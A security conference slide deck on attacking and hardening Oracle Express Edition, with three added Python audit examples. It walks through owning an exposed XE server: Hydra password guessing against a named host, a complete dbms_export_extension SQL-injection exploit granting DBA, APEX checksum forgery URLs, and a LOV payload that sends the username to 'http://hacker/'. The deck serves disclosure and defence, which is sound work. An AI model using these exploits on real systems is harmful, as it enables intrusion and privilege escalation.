Hacking and Hardening Oracle Express Edition
UK Oracle User Group, 14-Nov-2006
Alexander Kornbrust, Red Database Security GmbH

Agenda
- Introduction
- Architecture & Oracle Patch Policy for XE
- Oracle XE Security Demonstration
- Accounts & Passwords (unfixed)
- SQL Injection dbms_export_extension
- Default SID
- XMLDB HTTP Server / Oradb Servlet
- View Problems
- SQL Injection in APEX
- Conclusion
- References
- Q/A

Introduction: Red-Database-Security GmbH
- One of the leading companies in Oracle security
- More than 250 Oracle security bugs reported
- Located in Germany, but services worldwide
- Security audits
- Different Oracle anti-hacker trainings
- Software solutions (Repscan, Matrixay, Orasploit)
- Founded spring 2004

Introduction
- Oracle 10g XE is a free database for Windows and Linux
- Limited to 1 GB RAM, 4 GB data and 1 CPU
- XE is a starter database for developers, DBAs, independent software vendors, educational institutions, ...
- Oracle on Oracle Database 10g Express Edition: "Oracle Database 10g Express Edition (Oracle Database XE) is an entry-level, small-footprint database based on the Oracle Database 10g Release 2 code base that's free to develop, deploy, and distribute; fast to download; and simple to administer."
=> Sounds like a good choice for saving money

Introduction
- Based on Oracle 10.2.0.1
- Without Java
- Oracle Text installed
- Easy-to-use installer

Oracle Patch Policy XE
- For most products Oracle has quarterly patch updates (CPUs)
- But for XE Oracle does not deliver security patches
- XE is vulnerable to most 10g R2 security bugs fixed with CPU April 2006 and later
=> Ask Oracle for security patches for XE
=> Giving a vulnerable product away without security patches is NOT responsible
=> Do not use XE in production environments (especially ISVs)

Architecture Oracle XE
[Diagram: Oracle XE database with the HTTP listener (port 8080) and the TNS listener (port 1521) running on the same computer, the internal database behind a firewall]
- Database & HTTP listener are running on the same computer
- That's the reason why often the entire server is exposed to the internet (this happens from time to time even to Oracle)

Oracle XE Security Demonstration
- Demonstration of how to own an Oracle XE server connected to the internet

Oracle XE Security Demonstration
- Find an XE server with Google

Oracle XE Security Demonstration
- XE servers are often directly connected to the internet and DBAs forget to block port 1521. Now we try to identify the TNS listener:

    C:\>lsnrctl status h712792.sk.net
    LSNRCTL: Version 10.2.0.1.0 - Production on 13-NOV-2006
    Copyright (c) 1991, 2005, Oracle. All rights reserved.
    Connecting to (DESCRIPTION=(CONNECT_DATA=(SERVICE_NAME=))(ADDRESS=(PROTOCOL=TCP)(HOST=85.214.36.42)(PORT=1521)))
    TNS-01189: The listener could not authenticate the user

=> 10g listener with local OS authentication
=> Old 8i/9i listener remote exploits (with set log_file) no longer work

Oracle XE Security Demonstration
- Now we call the URL we found in Google:

    http://h712792.sk.net:8080/apex/f?p=200:201:1534012853711183::NO:::

Oracle XE Security Demonstration
- And we modify the URL and add the debug flag (replace NO with YES):

    http://h712792.sk.net:8080/apex/f?p=200:201:1534012853711183::YES:::

Oracle XE Security Demonstration
- We modify the APEX URL and add /oradb/USER/OBJECT
- The oradb servlet allows access to tables and views:

    http://h712792.sk.net:8080/oradb/PUBLIC/ALL_USERS

=> We do not have a username/password, so we have to guess one (e.g. with a free tool like Hydra)

Oracle XE Security Demonstration
- Use Hydra to break the password of a default user (e.g. HR, dbsnmp, system, ...):

    C:\>hydra -l hr -P xepw.txt -m / -s 8080 h712792.sk.net http-get
    Hydra v5.3 (c) 2006 by van Hauser / THC
    Hydra (http://www.thc.org) starting at 2006-11-13 11:34:51
    [DATA] 25 tasks, 1 servers, 85 login tries (l:1/p:25), ~1 tries per task
    [DATA] attacking service http-get on port 8080
    [STATUS] attack finished for h712792.sk.net
    [8080][www] host: 84.213.16.32 login: hr password: XX
    Hydra (http://www.thc.org) finished at 2006-11-13 11:34:52

=> Hydra found a working username & password
=> Login (attempts) are not logged in the listener.log

Oracle XE Security Demonstration
- Because XE has a default SID, we have everything to log in with SQL*Plus & Easy Connect:

    C:\>sqlplus hr/XX@//h712792.sk.net/XE
    SQL*Plus: Release 10.2.0.1.0 - Production on Nov 13 2006
    Copyright (c) 1982, 2005, Oracle. All rights reserved.
    Connected to:
    Oracle Database 10g Express Edition Release 10.2.0.1.0

    SQL> select * from v$version;
    BANNER
    ----------------------------------------------------------------
    Oracle Database 10g Express Edition Release 10.2.0.1.0
    PL/SQL Release 10.2.0.1.0 - Production
    CORE 10.2.0.1.0 Production
    TNS for Linux: Version 10.2.0.1.0 - Production
    NLSRTL Version 10.2.0.1.0 - Production
    SQL>

Oracle XE Security Demonstration
- Check the session roles of the HR user:

    SQL> select * from session_roles;
    ROLES
    ----------------------------------------------------------------
    CONNECT
    RESOURCE

=> The RESOURCE role is granted to HR
=> An attacker can now create procedures, required for some SQL injection exploits
=> The exploit for dbms_export_extension works

Oracle XE Security Demonstration
- The next step is the privilege escalation:

    C:\>sqlplus hr/XX@//h712792.sk.net/XE
    SQL*Plus: Release 10.2.0.1.0 - Production on Nov 13 2006
    Copyright (c) 1982, 2005, Oracle. All rights reserved.
    Connected to:
    Oracle Database 10g Express Edition Release 10.2.0.1.0

    SQL> -- USE dbms_export_extension exploit to become DBA

=> After reconnecting to the database, we are now DBA

Oracle XE Security Demonstration
- Check the database for other weak passwords with checkpwd:

    c:\> checkpwd.exe hr/xx@//h712792.sk.net/XE pwd.txt
    Checkpwd 1.21 - (c) 2006 by Red-Database-Security GmbH
    retrieving users and password hash values
    checking passwords
    USER1 welcome1 [OPEN]
    USER2 OK [OPEN]
    SYS OK [OPEN]
    SYSTEM elcaro1 [OPEN]
    ANONYMOUS OK [OPEN]
    HR has weak password HR [OPEN]
    [...]
    FLOWS_FILES has weak password ORACLE [EXPIRED & LOCKED]
    CTXSYS has weak password ORACLE [EXPIRED & LOCKED]
    DBSNMP has weak password DBSNMP [EXPIRED & LOCKED]
    FLOWS_020100 has weak password ORACLE [EXPIRED & LOCKED]
    XDB has weak password ORACLE [EXPIRED & LOCKED]
    Done. Summary:
    Passwords checked      : 21946905
    Weak passwords found   : 10
    Elapsed time (min:sec) : 1:03
    Passwords / second     : 353475

Oracle XE Security Demonstration
- Now we are DBA and able to run operating system commands (e.g. initiate a reverse shell with xterm or netcat), export the entire database, ...
- On Windows we have full access to the entire OS with SYSTEM privileges
Server 0wned !!!

Hardening XE
- Usernames & passwords
- XE default SID
- oradb servlet
- SQL injection in PL/SQL packages
- View problems
- SQL injection in APEX

Accounts & Passwords
- Good and strong passwords are important for protecting databases

Locked Accounts
- Oracle XE creates and locks the following default users:

    SQL> select username from dba_users where account_status like '%LOCKED%';
    USERNAME
    ------------------------------
    XDB
    FLOWS_020100
    DIP
    OUTLN
    CTXSYS
    MDSYS
    FLOWS_FILES
    TSMSYS
    8 rows selected.

- Locking database users is often recommended for security reasons, but it is not the best approach

Locked Accounts
- Locked database users can be used to enumerate installed database components without valid user credentials:

    sqlplus mdsys/random
    SQL*Plus: Release 10.2.0.1.0 - Production on Nov 13 2006
    Copyright (c) 1982, 2005, Oracle. All rights reserved.
    ERROR:
    ORA-28000: the account is locked

=> Component MDSYS is installed
=> Setting invalid Oracle passwords and unlocking user accounts is more secure

Locked Accounts / Version numbers
- Sometimes it's even possible to identify version numbers of products (e.g. APEX) with a simple login:

    sqlplus FLOWS_020100/random
    SQL*Plus: Release 10.2.0.1.0 - Production on Nov 13 2006
    Copyright (c) 1982, 2005, Oracle. All rights reserved.
    ERROR:
    ORA-28000: the account is locked

=> APEX 2.10 is installed (FLOWS_020100)
=> APEX always encodes the version number
=> Never encode version numbers in usernames

Invalid Passwords & New Profile
- To avoid information disclosure from the ORA-28000 error messages it is better to set an invalid password and unlock all locked user accounts
- To avoid the automatic locking of accounts after 10 invalid login attempts (the default setting in XE) you should create a new profile for the accounts with invalid passwords:

    SQL> create profile invalid limit failed_login_attempts unlimited;
    SQL> alter user dbsnmp identified by values 'invalid_pw' account unlock profile invalid;
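An audit of the account listing from the slides above, written as an added Python example (it is not code from the slides or from Red-Database-Security). It reads a constructed dba_users extract, reports which accounts answer a wrong password with ORA-28000 and so confirm that a component is installed, flags usernames that encode a product version, and emits the profile and ALTER USER statements the "Invalid Passwords & New Profile" slide uses. The decoding of FLOWS_020100 as 2.1.0 and the simulated login responses are assumptions made for the example; the ORA-01017 response is what Oracle returns for a wrong password on an open or non-existent account.

```python
import re

# Constructed sample of dba_users rows (username, account_status, profile),
# modelled on the XE default-account listing in the slides; not real data.
SAMPLE_ACCOUNTS = [
    ("SYS", "OPEN", "DEFAULT"),
    ("SYSTEM", "OPEN", "DEFAULT"),
    ("HR", "OPEN", "DEFAULT"),
    ("XDB", "EXPIRED & LOCKED", "DEFAULT"),
    ("FLOWS_020100", "EXPIRED & LOCKED", "DEFAULT"),
    ("DIP", "EXPIRED & LOCKED", "DEFAULT"),
    ("OUTLN", "EXPIRED & LOCKED", "DEFAULT"),
    ("CTXSYS", "EXPIRED & LOCKED", "DEFAULT"),
    ("MDSYS", "EXPIRED & LOCKED", "DEFAULT"),
    ("FLOWS_FILES", "EXPIRED & LOCKED", "DEFAULT"),
    ("TSMSYS", "EXPIRED & LOCKED", "DEFAULT"),
]

INVALID_PROFILE = "invalid"      # profile name used on the slide
INVALID_HASH = "invalid_pw"      # non-hex value: no password hashes to it
# Assumed encoding of the APEX schema name: FLOWS_MMmmpp -> MM.mm.pp
VERSION_IN_NAME = re.compile(r"^FLOWS_(\d\d)(\d\d)(\d\d)$")


def locked_accounts(accounts):
    """Usernames whose status contains LOCKED: a wrong-password login against
    these returns ORA-28000 and thereby confirms the component is installed."""
    return [u for u, status, _ in accounts if "LOCKED" in status]


def version_disclosing_names(accounts):
    """Map schema names that encode a product version to the decoded version."""
    found = {}
    for user, _, _ in accounts:
        m = VERSION_IN_NAME.match(user)
        if m:
            found[user] = ".".join(str(int(part)) for part in m.groups())
    return found


def login_response(accounts, username):
    """Simulated error an outsider sees when guessing a wrong password:
    ORA-28000 for a locked account, ORA-01017 otherwise (also for unknown
    users, so nothing is learned once no account is locked)."""
    for user, status, _ in accounts:
        if user == username:
            return "ORA-28000" if "LOCKED" in status else "ORA-01017"
    return "ORA-01017"


def remediation_sql(accounts):
    """Statements mirroring the slide: a profile without a lockout limit, then
    each locked account unlocked with a password value nobody can reproduce."""
    stmts = [f"CREATE PROFILE {INVALID_PROFILE} LIMIT failed_login_attempts UNLIMITED;"]
    for user in locked_accounts(accounts):
        stmts.append(
            f"ALTER USER {user} IDENTIFIED BY VALUES '{INVALID_HASH}' "
            f"ACCOUNT UNLOCK PROFILE {INVALID_PROFILE};"
        )
    return stmts


def apply_remediation(accounts):
    """Expected dba_users state after running remediation_sql()."""
    return [
        (u, "OPEN", INVALID_PROFILE) if "LOCKED" in status else (u, status, prof)
        for u, status, prof in accounts
    ]


if __name__ == "__main__":
    print("locked:", locked_accounts(SAMPLE_ACCOUNTS))
    print("version in username:", version_disclosing_names(SAMPLE_ACCOUNTS))
    print("MDSYS probe before:", login_response(SAMPLE_ACCOUNTS, "MDSYS"))
    hardened = apply_remediation(SAMPLE_ACCOUNTS)
    print("MDSYS probe after: ", login_response(hardened, "MDSYS"))
    print("\n".join(remediation_sql(SAMPLE_ACCOUNTS)))
```

Run against a real extract (`select username, account_status, profile from dba_users`), review the generated statements before executing them, and keep SYS and SYSTEM out of the locked list so they are never pointed at an invalid password.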
Exploit dbms_export_extension
- The package dbms_export_extension delivered with XE is vulnerable to SQL injection (exploit posted on BugTraq in April 2006)
- Create a package and inject it into dbms_export_extension:

    CREATE OR REPLACE PACKAGE EXPLOIT AUTHID CURRENT_USER IS
      FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo, P3 VARCHAR2, p4 VARCHAR2, env SYS.odcienv)
        RETURN NUMBER;
    END;
    /

Exploit dbms_export_extension

    CREATE OR REPLACE PACKAGE BODY EXPLOIT IS
      FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo, P3 VARCHAR2, p4 VARCHAR2, env SYS.odcienv)
        RETURN NUMBER
      IS
        pragma autonomous_transaction;
      BEGIN
        EXECUTE IMMEDIATE 'GRANT DBA TO HR';
        COMMIT;
        RETURN(1);
      END;
    END;
    /

Exploit dbms_export_extension

    DECLARE
      INDEX_NAME   VARCHAR2(200);
      INDEX_SCHEMA VARCHAR2(200);
      TYPE_NAME    VARCHAR2(200);
      TYPE_SCHEMA  VARCHAR2(200);
      VERSION      VARCHAR2(200);
      NEWBLOCK     PLS_INTEGER;
      GMFLAGS      NUMBER;
      v_Return     VARCHAR2(200);
    BEGIN
      INDEX_NAME   := 'A1';
      INDEX_SCHEMA := 'HR';
      TYPE_NAME    := 'EXPLOIT';
      TYPE_SCHEMA  := 'HR';
      VERSION      := '10.2.0.1.0';
      GMFLAGS      := 1;
      v_Return := SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA(
        INDEX_NAME   => INDEX_NAME,
        INDEX_SCHEMA => INDEX_SCHEMA,
        TYPE_NAME    => TYPE_NAME,
        TYPE_SCHEMA  => TYPE_SCHEMA,
        VERSION      => VERSION,
        NEWBLOCK     => NEWBLOCK,
        GMFLAGS      => GMFLAGS);
    END;
    /

dbms_export_extension / protection
- Due to the lack of patches it is necessary to revoke the execute privilege on dbms_export_extension from PUBLIC in XE
- To avoid export problems it is necessary to grant the privilege to the DBA role:

    SQL> revoke execute on sys.dbms_export_extension from public;
    SQL> grant execute on sys.dbms_export_extension to DBA;

XE default SID
- The default SID of every Oracle Express Edition is XE
- This knowledge allows attackers to connect to the database. Without knowing the SID it is not possible to connect to the database via OCI:

    sqlplus user/password@//10.1.1.117/XE;

=> Change the SID to a different value (8 characters, random)
=> See asktom.oracle.com for a description

Default SID
- The default SID of every Oracle Express Edition is XE
- Default SIDs can be guessed
- In 10g with local OS authentication the remote status command no longer works:

    C:\>lsnrctl status 192.168.2.234
    LSNRCTL Version 10.2.0.1.0 - Production on 13-NOV-2006
    Copyright (c) 1991, 2005, Oracle. All rights reserved.
    Connecting to (DESCRIPTION=(CONNECT_DATA=(SERVICE_NAME=))(ADDRESS=(PROTOCOL=TCP)(HOST=192.168.2.234)(PORT=1521)))
    TNS-01189: The listener could not authenticate the user

Default SID
- With SIDGUESS you can guess short or simple SIDs:

    C:\> sidguess host=xp10104 port=1521 sidfile=sid.txt
    Sidguess 1.00 - (c) 2006 by Red-Database-Security GmbH
    Oracle Security Consulting, Security Audits & Trainings
    http://www.red-database-security.com
    SID found: XE

- Now we can connect to the database with SQL*Plus

Default SID & Oracle Easy Connect
- To connect to an Oracle database we need
  - Username (e.g. dbsnmp or system)
  - Password
  - SID or service name (XE)
  - IP address
  - Port number (default: 1521)
=> Then we can use Oracle Easy Connect to connect to the database without tnsnames:

    sqlplus dbsnmp/mypw@//192.168.2.234:1521/XE;

Default SID / Protection
- Change the default SID to a long (8 character) and random value (not in a dictionary)
- asktom.oracle.com explains how to do this
- Be careful doing this (make backups)

Block all ports except HTTP
- Instead of changing the SID you could also block incoming requests on port 1521
- Block all ports (e.g. 1521) except the HTTP port (e.g. 80 or 8080) with the Windows Firewall or a Linux firewall

Oradb-Servlet
- By default, Oracle XE installs the oradb servlet
- This servlet allows access to tables/views via the browser
- Works even if port 1521 is blocked:

    http://192.168.2.234:8080/oradb/PUBLIC/ALL_USERS

Oradb-Servlet
- Now we can access every table/view accessible to our database user

Oradb-Servlet
- XE databases not using APEX/HTMLDB can disable XMLDB completely in the init.ora/pfile
- Remove the dispatchers line from init.ora and restart the database:

    dispatchers='(PROTOCOL=TCP)(SERVICE=XDB)'

Oradb-Servlet
- Or it's possible to change the HTTP port to 0 or a different value with the package dbms_xdb:

    -- change HTTP port from 8080 to 0
    call dbms_xdb.cfg_update(updateXML(dbms_xdb.cfg_get(),
      '/xdbconfig/sysconfig/protocolconfig/httpconfig/http-port/text()', 0));
    -- refresh settings
    exec dbms_xdb.cfg_refresh;

Oradb-Servlet
- To change the database role that is required to access the servlet:

    DECLARE
      doc  XMLType;
      doc2 XMLType;
      doc3 XMLType;
    BEGIN
      doc := DBMS_XDB.cfg_get();
      SELECT updateXML(doc,
        '/xdbconfig/sysconfig/protocolconfig/httpconfig/webappconfig/servletconfig/servlet-list/servlet[servlet-name="DBUriServlet"]/security-role-ref/role-name/text()',
        'servlet-users')
      INTO doc2 FROM DUAL;
      SELECT updateXML(doc2,
        '/xdbconfig/sysconfig/protocolconfig/httpconfig/webappconfig/servletconfig/servlet-list/servlet[servlet-name="DBUriServlet"]/security-role-ref/role-link/text()',
        'servlet-users')
      INTO doc3 FROM DUAL;
      DBMS_XDB.cfg_update(doc3);
      COMMIT;
    END;
    /

Oradb-Servlet
- On XE databases not using the oradb servlet it's possible to disable the oradb servlet:

    BEGIN
      URIFACTORY.unregisterURLHandler('oradb');
    END;
    /

View Problems I
- In April 2006 an Oracle Support analyst posted a note concerning an Oracle view problem.
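Returning to the two XDB settings the Oradb-Servlet slides change with dbms_xdb (the HTTP port and the DBUriServlet role), here is an offline check written as an added Python example; it is not code from the slides or from Oracle. It takes the configuration document as text (on a real system, the output of dbms_xdb.cfg_get()), reports both weak settings using the same paths the slides pass to updateXML(), and applies the same two edits. The xdbconfig fragment is constructed and reduced to the elements the check needs; its namespace and the default role name authenticatedUser are assumptions.

```python
import xml.etree.ElementTree as ET

# Constructed xdbconfig fragment, reduced to the elements the slides touch.
# Namespace and the default DBUriServlet role are assumptions.
SAMPLE_XDBCONFIG = """<?xml version="1.0"?>
<xdbconfig xmlns="http://xmlns.oracle.com/xdb/xdbconfig.xsd">
  <sysconfig>
    <protocolconfig>
      <httpconfig>
        <http-port>8080</http-port>
        <webappconfig>
          <servletconfig>
            <servlet-list>
              <servlet>
                <servlet-name>DBUriServlet</servlet-name>
                <security-role-ref>
                  <role-name>authenticatedUser</role-name>
                  <role-link>authenticatedUser</role-link>
                </security-role-ref>
              </servlet>
            </servlet-list>
          </servletconfig>
        </webappconfig>
      </httpconfig>
    </protocolconfig>
  </sysconfig>
</xdbconfig>
"""

HTTP_PORT_PATH = "sysconfig/protocolconfig/httpconfig/http-port"
DBURI_SERVLET_PATH = ("sysconfig/protocolconfig/httpconfig/webappconfig/"
                      "servletconfig/servlet-list/servlet[servlet-name='DBUriServlet']")
RESTRICTED_ROLE = "servlet-users"   # the dedicated role name the slide sets


def load(xml_text):
    """Parse and drop the namespace so the slide's paths can be used as-is."""
    root = ET.fromstring(xml_text)
    for el in root.iter():
        if isinstance(el.tag, str):
            el.tag = el.tag.split("}", 1)[-1]
    return root


def http_port(root):
    """Configured HTTP port as int, or None if the element is missing."""
    el = root.find(HTTP_PORT_PATH)
    return None if el is None or el.text is None else int(el.text.strip())


def dburi_servlet_roles(root):
    """(role-name, role-link) of the DBUriServlet entry, or None if absent."""
    servlet = root.find(DBURI_SERVLET_PATH)
    if servlet is None:
        return None
    ref = servlet.find("security-role-ref")
    if ref is None:
        return None
    return (ref.findtext("role-name", default="").strip(),
            ref.findtext("role-link", default="").strip())


def audit(xml_text):
    """Findings corresponding to the two hardening steps on the slides."""
    root = load(xml_text)
    findings = []
    port = http_port(root)
    if port != 0:
        findings.append(f"http-port is {port}: the XDB HTTP listener (APEX and oradb servlet) is reachable")
    roles = dburi_servlet_roles(root)
    if roles is not None and roles != (RESTRICTED_ROLE, RESTRICTED_ROLE):
        findings.append(f"DBUriServlet role is {roles[0]}/{roles[1]}: not restricted to {RESTRICTED_ROLE}")
    return findings


def harden(xml_text, port=0, role=RESTRICTED_ROLE):
    """Same edits the slides make with updateXML(): port to 0 and the servlet
    role-name/role-link to a dedicated role. Returns the new XML text."""
    root = load(xml_text)
    el = root.find(HTTP_PORT_PATH)
    if el is not None:
        el.text = str(port)
    servlet = root.find(DBURI_SERVLET_PATH)
    if servlet is not None:
        ref = servlet.find("security-role-ref")
        if ref is not None:
            for tag in ("role-name", "role-link"):
                child = ref.find(tag)
                if child is not None:
                    child.text = role
    return ET.tostring(root, encoding="unicode")


if __name__ == "__main__":
    for finding in audit(SAMPLE_XDBCONFIG):
        print("FINDING:", finding)
    print("after hardening:", audit(harden(SAMPLE_XDBCONFIG)) or "no findings")
```

The hardened document is only a preview of what the PL/SQL on the slides produces; the real change still has to go through dbms_xdb.cfg_update and dbms_xdb.cfg_refresh, and the check is worth re-running after each APEX or XDB upgrade, which can restore the defaults.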
View Problems I
- This problem allows inserting/updating/deleting data via views without having the privileges:

    SQL> CREATE VIEW emp_emp AS
           SELECT e1.ename, e1.empno, e1.deptno
           FROM scott.emp e1, scott.emp e2
           WHERE e1.empno = e2.empno;
    SQL> delete from emp_emp;
    14 rows deleted

=> This bug was fixed in non-XE Oracle versions with CPU July 2006
=> Be careful with the "CREATE VIEW" privilege

View Problems II
- I was able to identify a new, related but different bug using inline views a few weeks later
- No "CREATE VIEW" privilege required
- No workarounds possible

    insert into ( *** specially crafted inline view *** *** on SCOTT.EMP *** )
      values (999,'HACKER','HACKER',0,sysdate,10000,0,10);

=> Fixed in other Oracle versions with CPU October 2006

View Problems II
- This technique could be used to modify other people's APEX program code by updating their LOV:

    update ( *** specially crafted inline view *** *** on FLOWS_020100.WWV_FLOW_LISTS_OF_VALUES$ *** )
      set LOV_QUERY = 'select utl_http.request(''http://hacker/USER=''||user) from dual'
      where lower(LOV_QUERY) like '%select%'
    /

View Problems II
- Or an attacker could delete all the LOVs:

    delete from ( *** specially crafted inline view *** *** on FLOWS_020100.WWV_FLOW_LISTS_OF_VALUES$ *** )
    /

View Problems / Mitigation
- To mitigate the risk with views, be careful with the privilege "CREATE VIEW"
- But there are no workarounds available for the vulnerability related to inline views
- Try to restrict the possibility to run "free SQL"
- For this problem you need patches !!! But they are not available !!!

SQL Injection in APEX
- APEX 1.5-2.1 contains a remotely exploitable SQL injection:

    http://xe:8080/apex/wwv_flow_utilities.gen_popup_list?p_filter=&p_name=p_t02&p_element_index=1&p_hidden_elem_name=p_t01&p_form_index=0&p_max_elements=&p_escape_html=&p_ok_to_query=YES&p_flow_id=100&p_page_id=11&p_session_id=15108399238201864297&p_eval_value=&p_return_key=YES&p_translation=N&p_lov=select%20cust_last_name%20||%20'%2C%20'%20||%20cust_first_name%20d%2C%20customer_id%20r%20from%20demo_customers%20order%20by%20cust_last_name&p_lov_checksum=82C7EFB6FA3A2FA2C6E1A70FB63BB064

- Oracle is using a checksum to protect the SQL statement from modification

SQL Injection in APEX
- Modifying the SQL statement throws an error message because the checksum does not match
- The size of p_lov_checksum looks like MD5
- By using an interception package for dbms_obfuscation_toolkit it's possible to see all parameters passed to the MD5 function:

    15108399238201864297selectcust_last_namecust_first_namedcustomer_idrfromdemo_customersorderby14925112F685C139A

SQL Injection in APEX

    15108399238201864297selectcust_last_namecust_first_namedcustomer_idrfromdemo_customersorderby14925112F685C139A

- The first value is the session ID (available in the URL)
- The second value is the SQL statement without whitespace
- The third parameter is a value from the cookie
- Now we have everything to recalculate the MD5 checksum
- This checksum can be used in the URL for the new SQL statement

SQL Injection in APEX
- Running the URL with a modified statement and the new checksum works perfectly:

    http://xe:8080/apex/wwv_flow_utilities.gen_popup_list?p_filter=&p_name=p_t02&p_element_index=1&p_hidden_elem_name=p_t01&p_form_index=0&p_max_elements=&p_escape_html=&p_ok_to_query=YES&p_flow_id=100&p_page_id=11&p_session_id=15108399238201864297&p_eval_value=&p_return_key=YES&p_translation=N&p_lov=select%20*%20from%20all_users&p_lov_checksum=B43B39DF8A95E478BB2BAE9E0C3F0D0E

Conclusion
- Block all unneeded ports depending on your application (1521 or 80/8080)
- Use invalid database passwords and unlock accounts
- Use a special profile for invalid accounts
- Drop unneeded accounts
- Disable the oradb servlet and XMLDB if not needed
- Upgrade APEX to 2.2.1
- Revoke dbms_export_extension from PUBLIC and grant it to DBA
- Be careful with the "CREATE VIEW" and "CREATE PROCEDURE" privileges
- Ask Oracle for SECURITY PATCHES for XE

References
- Checkpwd 1.21 – Free Oracle Password Checker: http://www.red-database-security.com/software/checkpwd.html
- Hydra 5.3 – Password guesser: http://www.thc.org/thc-hydra/
- Exploit dbms_export_extension: http://www.red-database-security.com/exploits/oracle-sqlinjection-oracle-dbms_export_extension.html
- Oracle SIDGuess: http://www.red-database-security.com/whitepaper/oracle_guess_sid.html
- How to change an Oracle SID: http://asktom.oracle.com/pls/ask/f?p=4950:8:::::F4950_P8_DISPLAYID:318216852435
- Advisory SQL Injection in Oracle APEX: http://www.red-database-security.com/advisory/oracle_apex_sql_injection_wwv_flow_utilities.html

Q&A

Contact
Alexander Kornbrust, Business Director
Red-Database-Security GmbH
Bliesstrasse 16
D-66538 Neunkirchen
Germany
Phone:  +49 (6821) 95 17 637
Mobile: +49 (174) 98 78 118
Fax:    +49 (6821) 91 27 354
E-Mail: info@red-database-security.com
Web:    www.red-database-security.com
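A closing note on the SQL Injection in APEX slides, which describe a p_lov_checksum computed as MD5 over the session ID, the whitespace-stripped statement and a cookie value. The following Python is an added example, not code from the slides or from Oracle APEX: it models that unkeyed scheme with constructed values to show why a client holding its own session ID and cookie can always produce a valid checksum for a changed statement, and contrasts it with a keyed MAC over the same fields, which cannot be recomputed without the server-side key. The concatenation order, the cookie value and the server key are assumptions made for the example.

```python
import hashlib
import hmac

# Constructed request values, modelled on the p_session_id / p_lov parameters
# on the slides but not taken from them; the cookie value is invented.
SESSION_ID = "9876543210987654321"
COOKIE_VALUE = "0123456789ABCDEF"
ORIGINAL_LOV = "select cust_last_name d, customer_id r from demo_customers"
MODIFIED_LOV = "select * from all_users"
# The key lives only on the server; the client never sees it (constructed).
SERVER_KEY = b"constructed-server-side-secret"


def normalize(statement):
    """Strip all whitespace, as the slides say the checksummed statement is."""
    return "".join(statement.split())


def unkeyed_checksum(session_id, statement, cookie_value):
    """The scheme the slides describe: MD5 over values the client already
    knows (session ID from the URL, the statement, a cookie value). The exact
    concatenation is an assumption; the point is that no secret is mixed in."""
    data = session_id + normalize(statement) + cookie_value
    return hashlib.md5(data.encode()).hexdigest().upper()


def keyed_checksum(server_key, session_id, statement):
    """HMAC over the same public values with a server-only key. A NUL
    separator keeps the session ID and statement from running together."""
    msg = (session_id + "\x00" + normalize(statement)).encode()
    return hmac.new(server_key, msg, hashlib.sha256).hexdigest().upper()


def verify_unkeyed(session_id, statement, cookie_value, presented):
    expected = unkeyed_checksum(session_id, statement, cookie_value)
    return hmac.compare_digest(expected, presented)


def verify_keyed(server_key, session_id, statement, presented):
    expected = keyed_checksum(server_key, session_id, statement)
    return hmac.compare_digest(expected, presented)


def client_can_forge_unkeyed(session_id, cookie_value, new_statement):
    """A client with only its own session ID and cookie recomputes the
    unkeyed checksum for a statement of its choice; the server accepts it."""
    presented = unkeyed_checksum(session_id, new_statement, cookie_value)
    return verify_unkeyed(session_id, new_statement, cookie_value, presented)


def client_can_forge_keyed(session_id, new_statement, guessed_key):
    """Without the server key the client can only guess one; the keyed
    verifier, which uses SERVER_KEY, rejects the result."""
    presented = keyed_checksum(guessed_key, session_id, new_statement)
    return verify_keyed(SERVER_KEY, session_id, new_statement, presented)


if __name__ == "__main__":
    print("unkeyed scheme accepts modified statement:",
          client_can_forge_unkeyed(SESSION_ID, COOKIE_VALUE, MODIFIED_LOV))
    print("keyed scheme accepts modified statement:  ",
          client_can_forge_keyed(SESSION_ID, MODIFIED_LOV, b"guessed-key"))
    tag = keyed_checksum(SERVER_KEY, SESSION_ID, ORIGINAL_LOV)
    print("keyed tag still valid for original statement:",
          verify_keyed(SERVER_KEY, SESSION_ID, ORIGINAL_LOV, tag))
```

A keyed tag fixes the forgeability shown on the slides, but the stronger design is to never accept SQL text from the client at all: store the LOV query server-side and have the request carry only an opaque identifier that the server resolves, which is the direction the upgrade recommended in the Conclusion takes.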